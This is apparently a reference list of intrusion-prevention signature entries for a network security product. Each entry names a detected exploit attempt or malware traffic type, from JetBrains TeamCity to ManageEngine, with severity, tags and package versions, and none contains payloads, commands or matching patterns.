Last changed: sgpkg-ips-1637-5242
Vulnerability: JetBrains-TeamCity-Authentication-Bypass-CVE-2023-42793
Description:
Back to top

HTTP_CSU-JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Vulnerability: JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-JetBrains-TeamCity-Path-Traversal-CVE-2024-27199

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1700-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: JetBrains-TeamCity-Path-Traversal-CVE-2024-27199
Description:
Back to top

HTTP_CSU-Jetty-File-Disclosure-CVE-2021-28169

About this situation: An attempt to exploit a vulnerability in Jetty detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jetty Web Server, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Jetty-File-Disclosure-CVE-2021-28169
Description:
Back to top

HTTP_CSU-Jetty-Web-INF-File-Disclosure

About this situation: An attempt to exploit a vulnerability in Jetty Web Server detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Jetty Web Server, CVE2021, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1843-5242
Vulnerability: Jetty-Web-INF-File-Disclosure
Description:
Back to top

HTTP_CSU-Joomla-Administrator-Console-Access-Attempt

About this situation: Access to Joomla admin console login page detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Joomla, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Website-Admin-Console-Access
Description:
Back to top

HTTP_CSU-Joomla-AllVideos-File-Disclosure

About this situation: Detects Directory Traversal File Disclosure against Joomla AllVideos
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2010, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-289-4219
Vulnerability: Joomla-JoomlaWorks-AllVideos-Directory-Traversal-Disclosure
Description:
Back to top

HTTP_CSU-Joomla-TinyMCE-File-Upload-Remote-Code-Execution

About this situation: A vulnerability in Joomla TinyMCE file upload detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Joomla-TinyMCE-File-Upload-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-JOSSO-Login

About this situation: Login with Java Open Single Sign On detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Description:
Back to top

HTTP_CSU-Junos-OS-Local-File-Inclusion-CVE-2022-22246

About this situation: An attempt to exploit a vulnerability in Junos OS detected
Context: HTTP Request URI
Severity: 7
Tags: Junos OS, Any Hardware, CVE2022, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1607-5242
Vulnerability: Junos-OS-Local-File-Inclusion-CVE-2022-22246
Description:
Back to top

HTTP_CSU-Kaseya-VSA-Arbitrary-File-Upload

About this situation: An attempt to exploit a Kaseya VSA Arbitrary File Upload vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Kaseya VSA, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-776-5211
Last changed: sgpkg-ips-776-5211
Vulnerability: Kaseya-VSA-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSU-Keenvalue

About this situation: KeenValue traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, KeenValue, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Keenvalue
Description:
Back to top

HTTP_CSU-Kelihos-Bot-Activity

About this situation: Kelihos Bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Kelihos-Botnet
Description:
Back to top

HTTP_CSU-Kerio-Control-Crlf-Injection-CVE-2024-52875

About this situation: An attempt to exploit a vulnerability in Kerio Control detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Kerio Control, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Kerio-Control-Crlf-Injection-CVE-2024-52875
Description:
Back to top

HTTP_CSU-KeyBase-Keylogger-C2-Traffic

About this situation: Traffic resembling KeyBase keylogger was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: KeyBase-Keylogger-C2-Traffic
Description:
Back to top

HTTP_CSU-Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in KeySight N6854A and N6841A RF detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, KeySight N6854A and N6841A RF, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Keysight-N6854a-And-N6841a-RF-Sensor-Directory-Traversal
Description:
Back to top

HTTP_CSU-Koobface-Bot-Traffic

About this situation: Koobface Bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Koobface-Bot
Description:
Back to top

HTTP_CSU-Kubernetes-Authenticated-Code-Execution

About this situation: An attempt to exploit a vulnerability in Kubernetes detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Kubernetes, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Kubernetes-Authenticated-Code-Execution
Description:
Back to top

HTTP_CSU-Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Kubernetes Dashboard detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Kubernetes, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure
Description:
Back to top

HTTP_CSU-Lansweeper-Tickettemplateactions.aspx-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Lansweeper detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Lansweeper-Tickettemplateactions.aspx-Directory-Traversal
Description:
Back to top

HTTP_CSU-Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1174-5242
Vulnerability: Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection
Description:
Back to top

HTTP_CSU-LG-LED-Assistant-Updatefile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG LED Assistant detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, LG LED Assistant, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: LG-LED-Assistant-Updatefile-Directory-Traversal
Description:
Back to top

HTTP_CSU-LG-LED-Assistant-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG LED Assistant detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, LG LED Assistant, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: LG-LED-Assistant-Upload-Directory-Traversal
Description:
Back to top

HTTP_CSU-LibreNMS-addhost-Command-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, LibreNMS, CVE2018, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: LibreNMS-addhost-Command-Injection
Description:
Back to top

HTTP_CSU-LibreNMS-Collectd-Command-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, LibreNMS, CVE2019, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: LibreNMS-Collectd-Command-Injection
Description:
Back to top

HTTP_CSU-Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Lighttpd detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2022, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Lighttpd-Connection-Rea-Hheader-More-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Lighttpd-Url-Path-2f-Decode-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Lighttpd Project Lighttpd detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: Lighttpd-Url-Path-2f-Decode-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Linear-eMerge-E3-Series-Access-Controller-Command-Injection

About this situation: An attempt to exploit a vulnerability in a Linear eMerge E3-Series Access Controller detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Linear eMerge, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Linear-eMerge-E3-Series-Access-Controller-Command-Injection
Description:
Back to top

HTTP_CSU-Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Linksys WRH54G Router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys WRH54G Router, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Linksys-WRH54G-Router-HTTP-Request-Handling-Denial-of-Service
Description:
Back to top

HTTP_CSU-LinuxKI-Toolset-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in LinuxKI Toolset detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, LinuxKI Toolset, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Vulnerability: LinuxKI-Toolset-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000
Description:
Back to top

HTTP_CSU-LiteSpeed-Web-Server-Source-Code-Disclosure

About this situation: An attempt to exploit a LiteSpeed Web Server Source Code Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, LiteSpeed, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: LiteSpeed-Web-Server-Source-Code-Disclosure
Description:
Back to top

HTTP_CSU-Local-File-As-URI-Parameter

About this situation: A local path in the URI
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-638-5211
Description:
Back to top

HTTP_CSU-LogPOS-Malware-Traffic-Detected

About this situation: Suspicious traffic that resembles a LogPOS malware request was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: LogPOS-Malware
Description:
Back to top

HTTP_CSU-Loki-RAT-Traffic

About this situation: LOKI RAT traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Loki-RAT
Description:
Back to top

HTTP_CSU-Lotus-Notes-Cgi-Bin-BOF

About this situation: Possible cgi-bin long uri buffer overflow detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2000, Any Operating System not specific, Lotus Domino not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-1399-5242
Vulnerability: HTTP-IBM-Lotus-Notes-Domino-Long-URI-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Lotus-Notes-Directory-Traversal

About this situation: Possible Directory Traversal Detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2001, Any Operating System not specific, Lotus Domino not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: Lotus-Domino-Directory-Traversal
Description:
Back to top

HTTP_CSU-Lucee-Administrator-imgProcess-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Lucee detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Lucee, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1564-5242
Vulnerability: Lucee-Administrator-imgProcess-Arbitrary-File-Write
Description:
Back to top

HTTP_CSU-Lumma-Stealer-C2-Activity

About this situation: Lumma Stealer command-and-control traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Lumma Stealer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: Lumma-Stealer-C2-Activity
Description:
Back to top

HTTP_CSU-Lyris-Listmanager-Read-Attachment-SQL-Injection

About this situation: Detects Lyris ListManager /read/attachment/ SQL injection exploits
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Lyris ListManager, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Lyris-Listmanager-Read-Attachment-SQL-Injection
Description:
Back to top

HTTP_CSU-Macromedia-JRun-Isapi-Filter-Get-Request-Buffer-Overrun

About this situation: Detects exploit attempts against buffer overflow in Macromedia JRun and Coldfushion servers
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Macromedia JRun 4, ColdFusion, CVE2002, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-355-4219
Vulnerability: HTTP-Macromedia_JRun_Isapi_Filter_Get_Request_Buffer_Overrun
Description:
Back to top

HTTP_CSU-Macromedia-JRun-Server-File-Disclosure

About this situation: An attempt to exploit a vulnerability in Macromedia JRun detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Macromedia JRun 4, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Macromedia-JRun-Server-File-Disclosure
Description:
Back to top

HTTP_CSU-Magento-Forwarded-Parameter-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Magento detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Magento, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1583-5242
Vulnerability: Magento-Forwarded-Parameter-Authentication-Bypass
Description: CVE References: CVE-2015-1398
Back to top

HTTP_CSU-MagnusBilling-Application-Unauthenticated-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in MagnusBilling detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MagnusBilling, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: MagnusBilling-Application-Unauthenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Mahdi-Traffic

About this situation: Mahdi traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Mahdi
Description:
Back to top

HTTP_CSU-Mailpost-Debug-Information-Disclosure

About this situation: Mailpost.exe debug information disclosure
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, MailPost, CVE2004, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Mailpost-Debug-Information-Disclosure
Description:
Back to top

HTTP_CSU-MajorDoMo-Command-Injection

About this situation: An attempt to exploit a vulnerability in MajorDoMo detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, MajorDoMo, CVE2023, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: MajorDoMo-Command-Injection
Description:
Back to top

HTTP_CSU-Malat-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Malat-Botnet
Description:
Back to top

HTTP_CSU-Malicious-Bot-Activity

About this situation: Malicious Bot activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Description:
Back to top

HTTP_CSU-Malicious-KiXtart-Script-Infection-Traffic

About this situation: Malicious KiXtart Script infection traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: Malicious-KiXtart-Script-Infection-Traffic
Description:
Back to top

HTTP_CSU-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise

About this situation: Detects Mambo mosConfig_absolute_path exploits
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Joomla, Mambo Site Server, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-677-5211
Vulnerability: HTTP-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise
Description:
Back to top

HTTP_CSU-Mambo-Globals-Php-MosConfig-Live-Site-Compromise

About this situation: Detects Mambo mosConfig_live_site exploits
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Joomla, Mambo Site Server, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Mambo-Globals-Php-MosConfig-Live-Site-Compromise
Description:
Back to top

HTTP_CSU-man2web-Cgi-Command-Execution

About this situation: An attempt to execute command using man2web
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-Tohaid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-699-5211
Vulnerability: Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-Haid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in ManageEngine DesktopCentral detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload
Description:
Back to top

